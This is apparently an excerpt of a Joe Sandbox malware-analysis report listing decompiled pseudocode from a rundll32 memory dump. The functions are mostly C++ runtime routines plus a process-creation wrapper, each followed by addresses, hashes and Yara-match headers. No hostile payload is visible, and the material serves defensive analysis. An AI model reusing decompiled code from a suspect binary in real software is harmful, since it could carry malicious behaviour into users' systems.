				E00000285285C80A6CC0(_t29);
				if (_t56 -  *((intOrPtr*)(_t51 + 0x18)) >= 0) goto 0xc80a1dc1;
				_t52 =  *((intOrPtr*)(_t51 + 0x10));
				goto 0xc80a1dc3;
				if ( *((intOrPtr*)(_t52 + _t56 * 8)) != 0) goto 0xc80a1e2a;
				if (_t78 == 0) goto 0xc80a1dd2;
				goto 0xc80a1e2a;
				E00000285285C80A2824(0, 0, _t56,  &_a24, _t79, _t78, _t79);
				if (_t52 != 0xffffffff) goto 0xc80a1e01;
				E00000285285C8087290( &_v48);
				E00000285285C80C9940(_t56,  &_v48, 0xc813bb90, _t78);
				asm("int3");
				_t77 = _a24;
				 *0xc81518f8 = _t77;
				0xc80c5ad4();
				 *((long long*)( *((intOrPtr*)( *_t77 + 8))))();
				return E00000285285C80A1A5C(E00000285285C80A6C88(_t52, _t77),  &_a16);
			}



















                0x285c80a1d0c
                0x285c80a1d14
                0x285c80a1d1d
                0x285c80a1d22
                0x285c80a1d2c
                0x285c80a1d32
                0x285c80a1d39
                0x285c80a1d3e
                0x285c80a1d48
                0x285c80a1d51
                0x285c80a1d56
                0x285c80a1d5d
                0x285c80a1d5f
                0x285c80a1d67
                0x285c80a1d6f
                0x285c80a1d7b
                0x285c80a1d80
                0x285c80a1d87
                0x285c80a1d8f
                0x285c80a1d91
                0x285c80a1d99
                0x285c80a1da0
                0x285c80a1daa
                0x285c80a1dac
                0x285c80a1db5
                0x285c80a1db7
                0x285c80a1dbf
                0x285c80a1dc6
                0x285c80a1dcb
                0x285c80a1dd0
                0x285c80a1dda
                0x285c80a1de3
                0x285c80a1dea
                0x285c80a1dfb
                0x285c80a1e00
                0x285c80a1e01
                0x285c80a1e06
                0x285c80a1e17
                0x285c80a1e1f
                0x285c80a1e43

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 9d32b79da59d5c104d6bc5ce0d3d347c89ccd3b94439e08162b083fa72e03bc8
                • Instruction ID: fe15484f402ce7abcc1b9cd0785ff80db6e7ccf79f02d05ee074b1ded7d6e22b
                • Opcode Fuzzy Hash: 9d32b79da59d5c104d6bc5ce0d3d347c89ccd3b94439e08162b083fa72e03bc8
                • Instruction Fuzzy Hash: C831982A607F6081FB11DB15D5482E967A1E7957F0F588253DA6E13BEADE3CC442CF00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A9DEC Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000285285C80A9DEC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000285285C80A19DC(0,  &_a16);
				_t79 =  *0xc8151bb8; // 0x0
				_a24 = _t79;
				_t56 =  *0xc8151b08; // 0x0
				if (_t56 != 0) goto 0xc80a9e67;
				E00000285285C80A19DC(0,  &_a8);
				_t43 =  *0xc8151b08 - _t56; // 0x0
				if (_t43 != 0) goto 0xc80a9e56;
				_t26 =  *0xc8151908; // 0x0
				 *0xc8151908 = _t26 + 1;
				 *0xc8151b08 = _t51;
				_t29 = E00000285285C80A1A5C(_t51,  &_a8);
				_t57 =  *0xc8151b08; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0xc80a9e7b;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0xc80a9e7d;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0xc80a9f0a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0xc80a9ea3;
				E00000285285C80A6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0xc80a9ea1;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0xc80a9ea3;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0xc80a9f0a;
				if (_t79 == 0) goto 0xc80a9eb2;
				goto 0xc80a9f0a;
				E00000285285C80AC85C(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0xc80a9ee1;
				E00000285285C8087290( &_v48);
				E00000285285C80C9940(_t57,  &_v48, 0xc813bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0xc8151bb8 = _t78;
				0xc80c5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000285285C80A1A5C(E00000285285C80A6C88(_t53, _t78),  &_a16);
			}



















                0x285c80a9dec
                0x285c80a9df4
                0x285c80a9dfd
                0x285c80a9e02
                0x285c80a9e0c
                0x285c80a9e12
                0x285c80a9e19
                0x285c80a9e1e
                0x285c80a9e28
                0x285c80a9e31
                0x285c80a9e36
                0x285c80a9e3d
                0x285c80a9e3f
                0x285c80a9e47
                0x285c80a9e4f
                0x285c80a9e5b
                0x285c80a9e60
                0x285c80a9e67
                0x285c80a9e6f
                0x285c80a9e71
                0x285c80a9e79
                0x285c80a9e80
                0x285c80a9e8a
                0x285c80a9e8c
                0x285c80a9e95
                0x285c80a9e97
                0x285c80a9e9f
                0x285c80a9ea6
                0x285c80a9eab
                0x285c80a9eb0
                0x285c80a9eba
                0x285c80a9ec3
                0x285c80a9eca
                0x285c80a9edb
                0x285c80a9ee0
                0x285c80a9ee1
                0x285c80a9ee6
                0x285c80a9ef7
                0x285c80a9eff
                0x285c80a9f23

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: ddc823b0c55ebac6424c7150eb9c8b3a4dd77a85adfbbfdd4ed5a563a1c2915b
                • Instruction ID: 10b4064ebbb95ba163f74e56999522ee92cca4cd8e2d3f8ea7e0dc1b9b01dfd1
                • Opcode Fuzzy Hash: ddc823b0c55ebac6424c7150eb9c8b3a4dd77a85adfbbfdd4ed5a563a1c2915b
                • Instruction Fuzzy Hash: 8C31722A707F2081FB11DB15D5482E963A5E795BE0F188253EA6D13BEADE3CD952CF00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A1E44 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000285285C80A1E44(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t42;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				signed long long _t56;
				intOrPtr _t63;
				intOrPtr* _t77;
				long long _t78;
				void* _t79;

				_t50 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t79 = __rcx;
				E00000285285C80A19DC(0,  &_a16);
				_t78 =  *0xc81518e0; // 0x0
				_a24 = _t78;
				_t55 =  *0xc81518d0; // 0x0
				if (_t55 != 0) goto 0xc80a1ebf;
				E00000285285C80A19DC(0,  &_a8);
				_t42 =  *0xc81518d0 - _t55; // 0x0
				if (_t42 != 0) goto 0xc80a1eae;
				_t26 =  *0xc8151908; // 0x0
				 *0xc8151908 = _t26 + 1;
				 *0xc81518d0 = _t50;
				_t29 = E00000285285C80A1A5C(_t50,  &_a8);
				_t56 =  *0xc81518d0; // 0x0
				_t63 = _a8;
				if (_t56 -  *((intOrPtr*)(_t63 + 0x18)) >= 0) goto 0xc80a1ed3;
				_t51 =  *((intOrPtr*)(_t63 + 0x10));
				goto 0xc80a1ed5;
				if ( *((intOrPtr*)(_t51 + _t56 * 8)) != 0) goto 0xc80a1f62;
				if ( *((intOrPtr*)(_t63 + 0x24)) == dil) goto 0xc80a1efb;
				E00000285285C80A6CC0(_t29);
				if (_t56 -  *((intOrPtr*)(_t51 + 0x18)) >= 0) goto 0xc80a1ef9;
				_t52 =  *((intOrPtr*)(_t51 + 0x10));
				goto 0xc80a1efb;
				if ( *((intOrPtr*)(_t52 + _t56 * 8)) != 0) goto 0xc80a1f62;
				if (_t78 == 0) goto 0xc80a1f0a;
				goto 0xc80a1f62;
				E00000285285C80A28E8(0, 0, _t56,  &_a24, _t79, _t78, _t79);
				if (_t52 != 0xffffffff) goto 0xc80a1f39;
				E00000285285C8087290( &_v48);
				E00000285285C80C9940(_t56,  &_v48, 0xc813bb90, _t78);
				asm("int3");
				_t77 = _a24;
				 *0xc81518e0 = _t77;
				0xc80c5ad4();
				 *((long long*)( *((intOrPtr*)( *_t77 + 8))))();
				return E00000285285C80A1A5C(E00000285285C80A6C88(_t52, _t77),  &_a16);
			}



















                0x285c80a1e44
                0x285c80a1e4c
                0x285c80a1e55
                0x285c80a1e5a
                0x285c80a1e64
                0x285c80a1e6a
                0x285c80a1e71
                0x285c80a1e76
                0x285c80a1e80
                0x285c80a1e89
                0x285c80a1e8e
                0x285c80a1e95
                0x285c80a1e97
                0x285c80a1e9f
                0x285c80a1ea7
                0x285c80a1eb3
                0x285c80a1eb8
                0x285c80a1ebf
                0x285c80a1ec7
                0x285c80a1ec9
                0x285c80a1ed1
                0x285c80a1ed8
                0x285c80a1ee2
                0x285c80a1ee4
                0x285c80a1eed
                0x285c80a1eef
                0x285c80a1ef7
                0x285c80a1efe
                0x285c80a1f03
                0x285c80a1f08
                0x285c80a1f12
                0x285c80a1f1b
                0x285c80a1f22
                0x285c80a1f33
                0x285c80a1f38
                0x285c80a1f39
                0x285c80a1f3e
                0x285c80a1f4f
                0x285c80a1f57
                0x285c80a1f7b

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 9f7d957f0ffcc9841b217795bd5a469e617d2d6f12b071e1f2693da6535ece72
                • Instruction ID: 8b8783ec85d136800466ee394eadcfc6b72915556afaecee9c9787b70152e6f3
                • Opcode Fuzzy Hash: 9f7d957f0ffcc9841b217795bd5a469e617d2d6f12b071e1f2693da6535ece72
                • Instruction Fuzzy Hash: 5531692A607F6081FB21DB16E5482E967A1E7947E0F588253DA6E177EADF3CC446CF00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8097C20 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 63COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000285285C8097C20(signed int __edx, void* __eflags, void* __rcx) {
				void* _v72;
				signed char _t8;
				signed int _t10;

				_t10 = __edx & 0x00000017;
				 *(__rcx + 0x10) = _t10;
				_t8 =  *(__rcx + 0x14) & _t10;
				if (__eflags == 0) goto 0xc8097c4c;
				if (r8b != 0) goto 0xc8097c52;
				if ((_t8 & 0x00000004) != 0) goto 0xc8097c5c;
				if ((_t8 & 0x00000002) != 0) goto 0xc8097c99;
				goto 0xc8097cd6;
				return _t8;
			}






                0x285c8097c2c
                0x285c8097c2f
                0x285c8097c32
                0x285c8097c34
                0x285c8097c39
                0x285c8097c41
                0x285c8097c45
                0x285c8097c47
                0x285c8097c51

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionThrow
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 432778473-1866435925
                • Opcode ID: 630905e449d0313d16b455eea44e9d9020c95c9599d2484d6dfed617e88adc5d
                • Instruction ID: 28311737140513ce336104c2ffac501fff440870af1f598093c00764c6e464d5
                • Opcode Fuzzy Hash: 630905e449d0313d16b455eea44e9d9020c95c9599d2484d6dfed617e88adc5d
                • Instruction Fuzzy Hash: 77215066F22F3598FB01DF64E8456EC2371F750788F90C513EA5A26956EF2CD249CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C808DD20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 177processCOMMON
                Download Yara Rule
                C-Code - Quality: 31%
                			E00000285285C808DD20(void* __ecx, void* __edx, long long __rbx, long long __rcx, long long* __rdx) {
				void* __rsi;
				void* __rbp;
				void* __r14;
				void* __r15;
				int _t93;
				void* _t109;
				long long _t116;
				long long _t117;
				long long _t118;
				long long _t119;
				intOrPtr _t126;
				void* _t152;
				void* _t154;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t161;
				void* _t178;
				intOrPtr* _t179;
				long long _t181;
				void* _t183;
				long long* _t184;
				void* _t186;
				long long _t187;

				_t110 = __edx;
				_t109 = __ecx;
				 *((long long*)(_t160 + 0x10)) = __rdx;
				_t158 = _t160 - 0xa0;
				_t161 = _t160 - 0x1a0;
				 *((long long*)(_t158 - 0x18)) = 0xfffffffe;
				 *((long long*)(_t161 + 0x1f8)) = __rbx;
				_t184 = __rdx;
				_t187 = __rcx;
				r13d = 0;
				 *((intOrPtr*)(_t161 + 0x50)) = r13d;
				 *((long long*)(_t158 + 0xe0)) = __rcx;
				E00000285285C8090000(__rbx,  *((intOrPtr*)(__rcx + 0xd8)), _t158 + 0xe0, _t154, _t158);
				_t179 = _t187 + 0x80;
				if ( *_t179 == r13d) goto 0xc808de34;
				_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t187 + 0xd8)) + 8));
				_t116 =  *((intOrPtr*)(_t126 + 8));
				 *((long long*)(_t158 - 0x60)) = _t116;
				 *((long long*)(_t158 - 0x58)) = _t116;
				 *((long long*)(_t158 - 0x50)) = _t181;
				E00000285285C8089960(__edx, _t116, _t126, _t158 + 0x50, _t158,  *((intOrPtr*)(_t116 + 0x10)) + 0x68, _t158 - 0x60, __rdx, _t187, _t186, _t183);
				_t117 =  *((intOrPtr*)(_t126 + 0x10));
				 *((long long*)(_t158 - 0x48)) = _t117;
				 *((long long*)(_t158 - 0x40)) = _t117;
				 *((long long*)(_t158 - 0x38)) = _t181;
				E00000285285C8089960(_t110, _t117, _t126, _t158 + 0x68, _t158,  *((intOrPtr*)(_t117 + 0x10)) + 0x68, _t158 - 0x48, __rdx, _t187, _t181, _t178);
				_t118 =  *((intOrPtr*)(_t126 + 0x18));
				 *((long long*)(_t158 - 0x30)) = _t118;
				 *((long long*)(_t158 - 0x28)) = _t118;
				 *((long long*)(_t158 - 0x20)) = _t181;
				E00000285285C8089960(_t110, _t118, _t126, _t158 + 0x80, _t158,  *((intOrPtr*)(_t118 + 0x10)) + 8, _t158 - 0x30, __rdx, _t187, _t152, _t154);
				 *__rdx = _t181;
				 *((long long*)(__rdx + 8)) = _t181;
				 *((long long*)(__rdx + 0x10)) = _t181;
				E00000285285C808C940(_t118, __rdx + 0x18, _t158 + 0x80, _t157);
				 *((short*)(__rdx + 0x28)) = 1;
				 *((intOrPtr*)(_t161 + 0x50)) = 1;
				goto 0xc808e023;
				_t119 =  *((intOrPtr*)(_t187 + 0x78));
				 *((long long*)(_t161 + 0x48)) = _t187 + 0xe0;
				 *((long long*)(_t161 + 0x40)) = _t119;
				 *((long long*)(_t161 + 0x38)) =  *((intOrPtr*)(_t187 + 0xb8));
				 *((long long*)(_t161 + 0x30)) =  *((intOrPtr*)(_t187 + 0xd0));
				 *((intOrPtr*)(_t161 + 0x28)) =  *_t187;
				 *((intOrPtr*)(_t161 + 0x20)) =  *((intOrPtr*)(_t187 + 0xb0));
				_t93 = CreateProcessA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
				asm("movups xmm1, [esi]");
				asm("movdqu [ebp-0x10], xmm1");
				asm("movsd xmm0, [esi+0x10]");
				asm("movsd [ebp], xmm0");
				asm("movups [esp+0x58], xmm1");
				asm("movsd [esp+0x68], xmm0");
				asm("movdqa xmm0, [0x84874]");
				asm("movdqu [ebp-0x10], xmm0");
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x70], xmm0");
				if ( *((intOrPtr*)(_t187 + 0x98)) == 0) goto 0xc808dee2;
				asm("lock inc ecx");
				E00000285285C8071690(_t126, _t161 + 0x70,  *((intOrPtr*)(_t187 + 0x90)), _t187 + 0xe0, _t158,  *((intOrPtr*)(_t187 + 0x98)), __rdx);
				 *(_t158 - 0x80) = 1;
				CloseHandle(??);
				CloseHandle(??);
				if (_t93 == 0) goto 0xc808dfe2;
				 *_t179 = r13d;
				E00000285285C808C080(_t161 + 0x00000070 | 0xffffffffffffffff,  *((intOrPtr*)(_t187 + 0x90)));
				 *((long long*)(_t179 + 8)) = _t119;
				 *((long long*)(_t158 + 0xf0)) = _t187;
				E00000285285C8090100(_t126,  *((intOrPtr*)(_t187 + 0xd8)), _t158 + 0xf0);
				if ( *_t179 == 0) goto 0xc808df8e;
				 *((long long*)(_t158 - 0x70)) = _t187;
				 *((long long*)(_t158 - 0x68)) = _t179;
				asm("movaps xmm0, [ebp-0x70]");
				asm("movdqa [ebp+0x30], xmm0");
				E00000285285C808E660( *_t179, _t119,  *((intOrPtr*)(_t187 + 0xd8)));
				 *_t184 = _t181;
				 *((long long*)(_t184 + 8)) = _t181;
				 *((long long*)(_t184 + 0x10)) = _t181;
				E00000285285C808C940(_t119, _t184 + 0x18, _t158 + 0xf0);
				 *((short*)(_t184 + 0x28)) = 1;
				 *((intOrPtr*)(_t161 + 0x50)) = 1;
				E00000285285C808A460(_t119, _t126, _t161 + 0x58, _t187 + 0xe0);
				goto 0xc808e023;
				asm("movups xmm0, [esp+0x58]");
				asm("inc ecx");
				asm("movsd xmm1, [esp+0x68]");
				asm("repne inc ecx");
				asm("movdqa xmm0, [0x84785]");
				asm("movdqu [esp+0x58], xmm0");
				 *((long long*)(_t184 + 0x18)) =  *(_t161 + 0x70);
				 *((long long*)(_t184 + 0x20)) =  *((intOrPtr*)(_t161 + 0x78));
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x70], xmm0");
				 *((char*)(_t184 + 0x28)) =  *(_t158 - 0x80) & 0x000000ff;
				 *((char*)(_t184 + 0x29)) =  *(_t158 - 0x7f) & 0x000000ff;
				 *(_t158 - 0x80) = 0;
				goto 0xc808df77;
				E00000285285C80886E0( *((intOrPtr*)(_t161 + 0x78)), _t126, _t158 + 0x40);
				asm("movups xmm0, [eax]");
				asm("movaps [ebp-0x70], xmm0");
				E00000285285C80880C0(_t109, _t110, _t126, _t158 + 8, _t158 - 0x70, _t187 + 0xe0, _t158, " CreateProcess failed");
				 *((long long*)(_t158 + 8)) = 0xc810fa28;
				return E00000285285C80C9940(_t126, _t158 + 8, 0xc813bb58, _t187 + 0xe0);
			}



























                0x285c808dd20
                0x285c808dd20
                0x285c808dd20
                0x285c808dd30
                0x285c808dd38
                0x285c808dd3f
                0x285c808dd47
                0x285c808dd4f
                0x285c808dd52
                0x285c808dd55
                0x285c808dd58
                0x285c808dd5d
                0x285c808dd72
                0x285c808dd77
                0x285c808dd82
                0x285c808dd8f
                0x285c808dd93
                0x285c808dd9d
                0x285c808dda1
                0x285c808dda5
                0x285c808ddb5
                0x285c808ddba
                0x285c808ddc4
                0x285c808ddc8
                0x285c808ddcc
                0x285c808dddc
                0x285c808dde1
                0x285c808ddeb
                0x285c808ddef
                0x285c808ddf3
                0x285c808de06
                0x285c808de0b
                0x285c808de0e
                0x285c808de12
                0x285c808de1a
                0x285c808de20
                0x285c808de27
                0x285c808de2f
                0x285c808de34
                0x285c808de57
                0x285c808de5c
                0x285c808de61
                0x285c808de66
                0x285c808de6b
                0x285c808de6f
                0x285c808de8f
                0x285c808de97
                0x285c808de9a
                0x285c808de9f
                0x285c808dea4
                0x285c808dea9
                0x285c808deae
                0x285c808deb4
                0x285c808debc
                0x285c808dec1
                0x285c808dec4
                0x285c808dedb
                0x285c808dedd
                0x285c808dee7
                0x285c808deed
                0x285c808def7
                0x285c808df01
                0x285c808df09
                0x285c808df0f
                0x285c808df13
                0x285c808df18
                0x285c808df1d
                0x285c808df32
                0x285c808df3c
                0x285c808df3e
                0x285c808df42
                0x285c808df46
                0x285c808df4a
                0x285c808df56
                0x285c808df5b
                0x285c808df5e
                0x285c808df62
                0x285c808df6a
                0x285c808df70
                0x285c808df77
                0x285c808df84
                0x285c808df89
                0x285c808df8e
                0x285c808df93
                0x285c808df97
                0x285c808df9d
                0x285c808dfa3
                0x285c808dfab
                0x285c808dfb6
                0x285c808dfbf
                0x285c808dfc3
                0x285c808dfc6
                0x285c808dfd0
                0x285c808dfd8
                0x285c808dfdc
                0x285c808dfe0
                0x285c808dfe6
                0x285c808dfeb
                0x285c808dfee
                0x285c808e001
                0x285c808e00e
                0x285c808e040

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateErrorExceptionLastProcessThrow
                • String ID: CreateProcess failed
                • API String ID: 4160235580-2682455881
                • Opcode ID: 640137e91375ac19db5ae25c6535f8ce21ea7dfe50142579e9fc247d86508d75
                • Instruction ID: 6d67dd0c101248ac2b1f9f935c8490f52d58f807bada8852ff3325b045ee5759
                • Opcode Fuzzy Hash: 640137e91375ac19db5ae25c6535f8ce21ea7dfe50142579e9fc247d86508d75
                • Instruction Fuzzy Hash: 74918936602FA089E310CF64E8487DE77B4F7887A8F519216EF9867695EF78C185CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C806DCB0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000285285C806DCB0(void* __eax, void* __rcx, long long __rdx, void* __r8, long long __r9, long long _a16, long long _a32, long long _a40) {
				intOrPtr _t50;
				intOrPtr _t51;

				_a32 = __r9;
				_a16 = __rdx;
				if (__rcx == __r8) goto 0xc806dce6;
				_t50 =  *((intOrPtr*)(__rcx + 8));
				if (0x66666665 - _t50 - 1 < 0) goto 0xc806dd4a;
				 *((long long*)(__rcx + 8)) = _t50 + 1;
				 *((long long*)(__r8 + 8)) =  *((long long*)(__r8 + 8)) - 1;
				 *((long long*)( *((intOrPtr*)(__r9 + 8)))) = _a40;
				 *((long long*)( *((intOrPtr*)(_a40 + 8)))) = _a16;
				 *((long long*)( *((intOrPtr*)(_a16 + 8)))) = _a32;
				_t51 = _a16;
				 *((long long*)(_t51 + 8)) =  *((intOrPtr*)(_a40 + 8));
				 *((long long*)(_a40 + 8)) =  *((intOrPtr*)(_a32 + 8));
				 *((long long*)(_a32 + 8)) =  *((intOrPtr*)(_t51 + 8));
				return __eax;
			}





                0x285c806dcb0
                0x285c806dcb5
                0x285c806dcc1
                0x285c806dcc3
                0x285c806dcd8
                0x285c806dcde
                0x285c806dce2
                0x285c806dcef
                0x285c806dd00
                0x285c806dd11
                0x285c806dd19
                0x285c806dd26
                0x285c806dd38
                0x285c806dd41
                0x285c806dd49

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task$ExceptionThrowstd::bad_alloc::bad_alloc
                • String ID: list<T> too long
                • API String ID: 2386360001-4027344264
                • Opcode ID: 8c3d43a86d18826729c4a74967e66e581c383eb1c22cc10e142ec2daa4007e92
                • Instruction ID: dc6aac229751ad06e3441d83221091dde96243b2b41e8d0ddd4bd1b8fe8c80e2
                • Opcode Fuzzy Hash: 8c3d43a86d18826729c4a74967e66e581c383eb1c22cc10e142ec2daa4007e92
                • Instruction Fuzzy Hash: 7251577A202F9482DA00EF1AE499259B7E4F788BE0F15C622DE9D577A4DE79C491CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80E7C88 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 85%
                			E00000285285C80E7C88(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				void* _t52;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0xc80e7cb9;
				if (__edx >= 0) goto 0xc80e7cb9;
				E00000285285C80E31F4(_t27, _t52);
				_t28 = _t27 & 0xfffffff7;
				goto 0xc80e7d10;
				_t43 = 0x00000004 & dil;
				if (_t43 == 0) goto 0xc80e7cd4;
				asm("dec eax");
				if (_t43 >= 0) goto 0xc80e7cd4;
				E00000285285C80E31F4(_t28, _t52);
				_t29 = _t28 & 0xfffffffb;
				goto 0xc80e7d10;
				_t44 = dil & 0x00000001;
				if (_t44 == 0) goto 0xc80e7cf0;
				asm("dec eax");
				if (_t44 >= 0) goto 0xc80e7cf0;
				E00000285285C80E31F4(_t29, _t52);
				_t30 = _t29 & 0xfffffffe;
				goto 0xc80e7d10;
				_t45 = dil & 0x00000002;
				if (_t45 == 0) goto 0xc80e7d10;
				asm("dec eax");
				if (_t45 >= 0) goto 0xc80e7d10;
				if ((dil & 0x00000010) == 0) goto 0xc80e7d0d;
				E00000285285C80E31F4(_t30, _t52);
				_t31 = _t30 & 0xfffffffd;
				_t47 = dil & 0x00000010;
				if (_t47 == 0) goto 0xc80e7d2a;
				asm("dec eax");
				if (_t47 >= 0) goto 0xc80e7d2a;
				E00000285285C80E31F4(_t31, _t52);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                0x285c80e7c88
                0x285c80e7c8d
                0x285c80e7c9c
                0x285c80e7ca4
                0x285c80e7ca8
                0x285c80e7caf
                0x285c80e7cb4
                0x285c80e7cb7
                0x285c80e7cbe
                0x285c80e7cc1
                0x285c80e7cc3
                0x285c80e7cc8
                0x285c80e7cca
                0x285c80e7ccf
                0x285c80e7cd2
                0x285c80e7cd4
                0x285c80e7cd8
                0x285c80e7cda
                0x285c80e7cdf
                0x285c80e7ce6
                0x285c80e7ceb
                0x285c80e7cee
                0x285c80e7cf0
                0x285c80e7cf4
                0x285c80e7cf6
                0x285c80e7cfb
                0x285c80e7d01
                0x285c80e7d08
                0x285c80e7d0d
                0x285c80e7d10
                0x285c80e7d14
                0x285c80e7d16
                0x285c80e7d1b
                0x285c80e7d22
                0x285c80e7d40

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 2011e68a8fb9851642cd3d370e902918837add7e0efacca9b0130383fcbbf733
                • Instruction ID: 27ccb2be142f0dc4451f1d8ca6088b135695280f0e4ecea8b76c1ff97c8b9666
                • Opcode Fuzzy Hash: 2011e68a8fb9851642cd3d370e902918837add7e0efacca9b0130383fcbbf733
                • Instruction Fuzzy Hash: 7211022E70AF7105F6681128F44E37B4451EB463B1F19CA2EEBE2236E6DE2C88414B01
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80CBD10 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 153COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 65%
                			E00000285285C80CBD10(void* __edx, signed int __edi, void* __ebp, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* _t70;
				intOrPtr _t81;
				unsigned int _t89;
				signed int _t96;
				signed int _t98;
				char _t100;
				signed int _t104;
				unsigned int _t113;
				void* _t135;
				signed int _t145;

				_t145 = __rsi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t135 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0xc80cbd4a;
				_t70 = E00000285285C80D3944(__rax);
				 *__rax = 0x16;
				E00000285285C80CAABC(_t70);
				goto 0xc80cbef9;
